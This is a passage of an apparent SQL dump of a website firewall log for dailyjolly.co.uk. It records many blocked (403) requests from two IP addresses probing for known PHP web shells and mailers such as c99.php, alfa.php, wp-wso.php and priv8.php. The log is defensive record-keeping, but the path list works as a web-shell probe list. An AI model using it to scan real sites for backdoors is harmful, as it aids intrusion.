3.5.30729)\"}','BrPIbFEg3xn9OkezWuHSpCZ0',0,1674412398.2914,566,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/b.php?http://dailyjolly.co.uk/b.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Ka8TIc3ZW9Rh4YwrniU5qfBx',0,1674412402.8456,345,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','oXYCfFNOQjcPp2rBwhdx0H97',0,1674412405.2739,597,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/c.php?http://dailyjolly.co.uk/c.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','2EZJrXdfuKSyOjY0PQFbzi56',0,1674412408.9984,339,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/shx.php?http://dailyjolly.co.uk/shx.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','nlsvKbtZaDUV0qwpJfhRO9rd',0,1674412415.2241,1103,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/alfa.php?http://dailyjolly.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','jSQuPazEZOX9UqKiJ8VRncIe',0,1674412420.5832,602,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/2.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','LylXbY4gzZ50xhD8O7p6FeWQ',0,1674412423.3239,898,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/a.php?http://dailyjolly.co.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','fePWR52y7Q0K8tNcYxGSMki6',0,1674412428.9800,553,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/3.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','MPC4iphDJ8yFYxI7R9ujXocL',0,1674412432.5885,829,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/old-index.php?http://dailyjolly.co.uk/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','qisk5Cd7mV8NSoI9bHLTyXhP',0,1674412433.9575,269,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/m.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','YnuwKPQEfxRAMGoOVg5ZtDcS',0,1674412441.7789,877,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/FoxWSO.php?http://dailyjolly.co.uk/FoxWSO.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','UI53nMpFN6aXVB8exWA0GwLy',0,1674412441.6326,1128,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/x.php?http://dailyjolly.co.uk/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','JI1s5vxfaOGeAzSLyH06ZRMi',0,1674412449.7000,452,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/403.php?http://dailyjolly.co.uk/403.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','cYBt89Sw1lnWTo65fyHKbVXQ',0,1674412457.1617,589,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/mini.php?http://dailyjolly.co.uk/mini.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','pV40EiQSnoltfAZCKqhd6ykj',0,1674412466.1400,1021,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/imagesvuln.php?http://dailyjolly.co.uk/imagesvuln.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','i5DG2Yz0jeA1JFbOWrHSIUul',0,1674412472.5180,748,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/edit-form.php?http://dailyjolly.co.uk/edit-form.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','rL2C3Oc48U7DkaoYTstx5RjW',0,1674412480.1000,421,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/c.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','KAvjdm8p92CfO07PbZi3FGyM',0,1674412482.0944,470,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wikindex.php?http://dailyjolly.co.uk/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','je0Xv6nsS7dr8lDuckOKEBmh',0,1674412488.1016,423,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/m.php?http://dailyjolly.co.uk/m.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','9qUSvnrFijBXozP5aDZyCG8x',0,1674412494.3158,606,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/k.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','5x2dTbk03tXahnVWJcqrKCMu',0,1674412497.0100,442,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/0byte.php?http://dailyjolly.co.uk/0byte.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','YAaCoHnJ5vwcXNW1xZtPh7Ij',0,1674412503.9939,824,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/xx.php?http://dailyjolly.co.uk/xx.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','vFTengfAyhPlujZN5dSY2XWH',0,1674412516.1429,429,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/new-index.php?http://dailyjolly.co.uk/new-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','TJPxqok2jyBO0XWV5dnaemZb',0,1674412525.2108,448,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','96Qum3gWLpADjshnkK8iFEyx',0,1674412525.1294,588,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp.php?http://dailyjolly.co.uk/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Cc4FdMBAquyQ3LYWatswf2hl',0,1674412532.1800,861,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/28.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Qpohly4V8NSk2F1qHRsj7xnu',0,1674412532.3445,706,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-wso.php?http://dailyjolly.co.uk/wp-wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','QCDVmBzqM8xyZHLdIvfAj90W',0,1674412538.5750,273,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/.Wp-maiiler.phP','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','4u1lIXbRsJSjy5C2B9W8G7qz',0,1674412540.7676,377,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/qindex.php?http://dailyjolly.co.uk/qindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','zwSNMerd1U2W8biLvtDoqlBQ',0,1674412545.5282,899,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/owl.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','A1iYa73kGTogp48BLQlrRI25',0,1674412548.4908,538,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/priv8.php?http://dailyjolly.co.uk/priv8.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','x1TPkYrqZyJHet6vLDzoaf4b',0,1674412551.9690,284,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-content/owl.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','degLZ7T632KI8FcORhCraf14',0,1674412557.1831,871,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/minimo.php?http://dailyjolly.co.uk/minimo.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','oEziDGhCaJsePHbIX7RMYmlp',0,1674412559.2001,343,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/xleet.php?http://dailyjolly.co.uk/xleet.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','XRkymlzsOpZeC5bY87BqPtNf',0,1674412567.1144,624,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-maiiler.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Z3ow9DLgcWKJhT4S6QpyAPGk',0,1674412568.8692,704,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/V3.php?http://dailyjolly.co.uk/V3.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','1pDMSjGcmX8nrZtdxA5RwiKv',0,1674412572.7804,736,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/send.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','0MvZ2AyU4ETDdNqlVPkRKLax',0,1674412577.5152,339,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/V5.php?http://dailyjolly.co.uk/V5.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','yiBYvRnkVGmxoNqrXSge2b45',0,1674412582.2582,778,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/404.php?http://dailyjolly.co.uk/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','8DLwnZU93hbWHNpqe0BPGCtO',0,1674412590.8622,1312,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/.Wp-maiiler.phP','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','0vpWMbf8U5wrONJEdyxakqV7',0,1674412596.6167,317,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/up.php?http://dailyjolly.co.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','dlwv5tIC4pVWX1nDiNoJUq7r',0,1674412599.4865,373,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/www.php?http://dailyjolly.co.uk/www.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','YceNT5WMD6gpGkVqrXHFuva3',0,1674412603.7881,709,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/alexus.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','fJ6a2CjqdtlrONWbn3w8vK74',0,1674412610.7899,290,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/100.php?http://dailyjolly.co.uk/100.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','0LZQTihrNI8tdCmbDaqlFpfE',0,1674412614.3214,312,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/777.php?http://dailyjolly.co.uk/777.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','LetCTZGsmQYrFiNPjM4JOhxv',0,1674412623.2995,685,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/defau1t.php?http://dailyjolly.co.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','zEGfev1qQb8tk6sn7WhV4NuS',0,1674412630.8007,826,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/f.php?http://dailyjolly.co.uk/f.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Z0WwBYjCSOFPnXAt36DdRU1r',0,1674412638.7602,529,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/xox.php?http://dailyjolly.co.uk/xox.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Uwtf9X8ZCmWuDK0LRF5Vg46x',0,1674412645.9544,501,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/o.php?http://dailyjolly.co.uk/o.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','qJInatwdp3y7Vzbs9ZSK8HC1',0,1674412653.7227,337,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/new.php?http://dailyjolly.co.uk/new.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Y2tL1E4ocNDSMOaGW5bmfK6z',0,1674412662.0319,324,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/sindex.php?http://dailyjolly.co.uk/sindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','meFHzrCRG4yuEhpWkjIQ9158',0,1674412668.5651,269,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/baindex.php?http://dailyjolly.co.uk/baindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','PMA8XheRgasDKBLH2cn5G0bj',0,1674412675.3761,881,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wi.php?http://dailyjolly.co.uk/wi.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','pQjnIOoLrK9DmxP6FugU8ZXh',0,1674412683.2451,290,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/mar.php?http://dailyjolly.co.uk/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','XJz5MtDhFqcnGf9QKs1N8pgk',0,1674412688.5194,287,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/root.php?http://dailyjolly.co.uk/root.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ObMSuFIXc1gosxjiAaZPvqtN',0,1674412694.4761,607,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/nee.php?http://dailyjolly.co.uk/nee.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','yIGfZoD8xFMPNzle7ErRsbTL',0,1674412700.2820,342,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/v.php?http://dailyjolly.co.uk/v.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','6ayqpoDlQctZj5HLGxhO90Ud',0,1674412705.8858,531,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/z.php?http://dailyjolly.co.uk/z.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ysxKBroNPgvfQG1XnFYLiOh7',0,1674412712.2280,718,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/g.php?http://dailyjolly.co.uk/g.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','2I0ODXti81mdJAK56Sx3bV7v',0,1674412724.9840,1024,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/c99.php?http://dailyjolly.co.uk/c99.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','gKMkHO3PDzCV9oseIdLbTfwl',0,1674412735.4681,555,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/w.php?http://dailyjolly.co.uk/w.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','REZIyQ7kFqJSB60wf9nTzYLe',0,1674412746.5341,364,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/ws.php?http://dailyjolly.co.uk/ws.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','XkZCGV5faegcS1vHdj6DFQ9s',0,1674412751.0578,328,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/2.php?http://dailyjolly.co.uk/2.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','CK2yNSBefi91hDFAdMko0v84',0,1674412757.9995,711,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/lol.php?http://dailyjolly.co.uk/lol.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','gZfFnNQ7vORhSxIE4LACwcDy',0,1674412765.6224,367,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/87.php?http://dailyjolly.co.uk/87.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','LO6wAfp1IKkNcCMgZztVvPDd',0,1674412771.9284,483,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/7yn.php?http://dailyjolly.co.uk/7yn.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','VG1eUXMzROZ3dAoBmL9I5Pjc',0,1674412777.3513,611,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/haxor.php?http://dailyjolly.co.uk/haxor.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','MxB1Sso0F7bDkmIHzeh28dlQ',0,1674412780.9039,527,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/13.php?http://dailyjolly.co.uk/13.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','kRcoAIwr4S5OKp1nVEZ7vgjW',0,1674412785.5333,376,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/e.php?http://dailyjolly.co.uk/e.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','oZ0NL1yxabYl9pUTeF3XWPMO',0,1674412789.7399,483,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/r.php?http://dailyjolly.co.uk/r.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','qyia0YskVO468TrczSe2XvA9',0,1674412795.7781,559,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/t.php?http://dailyjolly.co.uk/t.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','xYoRPQSWXKUvj3srm6TyuaAi',0,1674412803.2130,284,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/y.php?http://dailyjolly.co.uk/y.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','0t4ER1687MNHwUJTL5uBIkYc',0,1674412807.5348,477,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/u.php?http://dailyjolly.co.uk/u.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','AIl9GxXBgt6hsc8Pk4ajJTpd',0,1674412816.6004,702,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/i.php?http://dailyjolly.co.uk/i.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 